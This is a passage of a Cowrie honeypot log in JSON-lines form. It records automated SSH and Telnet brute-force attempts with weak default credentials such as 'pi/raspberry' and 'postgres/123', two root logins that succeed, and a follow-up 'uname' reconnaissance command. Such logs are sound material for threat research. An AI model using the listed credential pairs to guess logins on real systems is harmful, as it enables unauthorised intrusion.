{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:28:38.173728Z","src_ip":"212.227.125.160","session":"81445c1a219f"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:28:38.858949Z","src_ip":"212.227.125.160","session":"81445c1a219f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:40.136413Z","src_ip":"212.227.125.160","session":"81445c1a219f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48142,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef47ed588e34","protocol":"ssh","message":"New connection: 212.227.235.229:48142 (1.2.3.4:22) [session: ef47ed588e34]","sensor":"my-vps","timestamp":"2025-08-28T06:28:44.528334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:28:44.529224Z","src_ip":"212.227.235.229","session":"ef47ed588e34"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:28:44.779844Z","src_ip":"212.227.235.229","session":"ef47ed588e34"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:28:45.533966Z","src_ip":"212.227.235.229","session":"ef47ed588e34"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:46.788233Z","src_ip":"212.227.235.229","session":"ef47ed588e34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56962,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b411458ed4a","protocol":"ssh","message":"New connection: 212.227.125.160:56962 (1.2.3.4:22) [session: 6b411458ed4a]","sensor":"my-vps","timestamp":"2025-08-28T06:28:54.504876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:28:54.507278Z","src_ip":"212.227.125.160","session":"6b411458ed4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:28:54.740639Z","src_ip":"212.227.125.160","session":"6b411458ed4a"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:28:55.596456Z","src_ip":"212.227.125.160","session":"6b411458ed4a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:56.817067Z","src_ip":"212.227.125.160","session":"6b411458ed4a"}
{"eventid":"cowrie.session.closed","duration":30.85891890525818,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:59.142335Z","src_ip":"8.222.212.69","session":"8f34fdbe5962"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63688,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a77cbaba467","protocol":"ssh","message":"New connection: 217.72.205.35:63688 (1.2.3.4:22) [session: 5a77cbaba467]","sensor":"my-vps","timestamp":"2025-08-28T06:29:00.740567Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:00.741641Z","src_ip":"217.72.205.35","session":"5a77cbaba467"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56052,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f013cfa8f96","protocol":"ssh","message":"New connection: 212.227.235.229:56052 (1.2.3.4:22) [session: 6f013cfa8f96]","sensor":"my-vps","timestamp":"2025-08-28T06:29:00.966366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:29:00.967335Z","src_ip":"212.227.235.229","session":"6f013cfa8f96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:29:01.230055Z","src_ip":"212.227.235.229","session":"6f013cfa8f96"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:29:02.021176Z","src_ip":"212.227.235.229","session":"6f013cfa8f96"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:03.288508Z","src_ip":"212.227.235.229","session":"6f013cfa8f96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57952,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b53ad89df70","protocol":"ssh","message":"New connection: 212.227.125.160:57952 (1.2.3.4:22) [session: 0b53ad89df70]","sensor":"my-vps","timestamp":"2025-08-28T06:29:10.824699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:29:10.825440Z","src_ip":"212.227.125.160","session":"0b53ad89df70"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:29:11.043538Z","src_ip":"212.227.125.160","session":"0b53ad89df70"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:29:11.700022Z","src_ip":"212.227.125.160","session":"0b53ad89df70"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:12.920311Z","src_ip":"212.227.125.160","session":"0b53ad89df70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37588,"dst_ip":"1.2.3.4","dst_port":22,"session":"74c7c4ac904f","protocol":"ssh","message":"New connection: 212.227.235.229:37588 (1.2.3.4:22) [session: 74c7c4ac904f]","sensor":"my-vps","timestamp":"2025-08-28T06:29:17.388592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:29:17.389129Z","src_ip":"212.227.235.229","session":"74c7c4ac904f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:29:17.643360Z","src_ip":"212.227.235.229","session":"74c7c4ac904f"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:29:18.407340Z","src_ip":"212.227.235.229","session":"74c7c4ac904f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:19.663238Z","src_ip":"212.227.235.229","session":"74c7c4ac904f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40534,"dst_ip":"1.2.3.4","dst_port":22,"session":"e040bd2e6a46","protocol":"ssh","message":"New connection: 212.227.125.160:40534 (1.2.3.4:22) [session: e040bd2e6a46]","sensor":"my-vps","timestamp":"2025-08-28T06:29:27.110024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:29:27.120440Z","src_ip":"212.227.125.160","session":"e040bd2e6a46"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:29:27.333887Z","src_ip":"212.227.125.160","session":"e040bd2e6a46"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:29:28.228791Z","src_ip":"212.227.125.160","session":"e040bd2e6a46"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:29:28.699230Z","src_ip":"212.227.125.160","session":"e040bd2e6a46"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:29:28.699921Z","src_ip":"212.227.125.160","session":"e040bd2e6a46"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:28.927154Z","src_ip":"212.227.125.160","session":"e040bd2e6a46"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:28.928630Z","src_ip":"212.227.125.160","session":"e040bd2e6a46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58076,"dst_ip":"1.2.3.4","dst_port":23,"session":"85dd2af7908f","protocol":"telnet","message":"New connection: 212.227.235.229:58076 (1.2.3.4:23) [session: 85dd2af7908f]","sensor":"my-vps","timestamp":"2025-08-28T06:29:31.972605Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T06:29:32.775139Z","src_ip":"212.227.235.229","session":"85dd2af7908f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49314,"dst_ip":"1.2.3.4","dst_port":22,"session":"77bb63281ed7","protocol":"ssh","message":"New connection: 212.227.235.229:49314 (1.2.3.4:22) [session: 77bb63281ed7]","sensor":"my-vps","timestamp":"2025-08-28T06:29:33.597315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:29:33.598031Z","src_ip":"212.227.235.229","session":"77bb63281ed7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:29:33.849861Z","src_ip":"212.227.235.229","session":"77bb63281ed7"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:29:34.607911Z","src_ip":"212.227.235.229","session":"77bb63281ed7"}
{"eventid":"cowrie.session.closed","duration":3.1014912128448486,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:35.074020Z","src_ip":"212.227.235.229","session":"85dd2af7908f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:29:35.189996Z","src_ip":"212.227.235.229","session":"77bb63281ed7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:29:35.190762Z","src_ip":"212.227.235.229","session":"77bb63281ed7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:35.443667Z","src_ip":"212.227.235.229","session":"77bb63281ed7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:35.444662Z","src_ip":"212.227.235.229","session":"77bb63281ed7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33230,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f0d8be87092","protocol":"telnet","message":"New connection: 212.227.235.229:33230 (1.2.3.4:23) [session: 0f0d8be87092]","sensor":"my-vps","timestamp":"2025-08-28T06:29:39.464334Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T06:29:40.243256Z","src_ip":"212.227.235.229","session":"0f0d8be87092"}
{"eventid":"cowrie.session.closed","duration":3.041654109954834,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:42.505891Z","src_ip":"212.227.235.229","session":"0f0d8be87092"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38788,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb69c5a8f39c","protocol":"ssh","message":"New connection: 212.227.125.160:38788 (1.2.3.4:22) [session: cb69c5a8f39c]","sensor":"my-vps","timestamp":"2025-08-28T06:29:43.137712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:29:43.143018Z","src_ip":"212.227.125.160","session":"cb69c5a8f39c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","a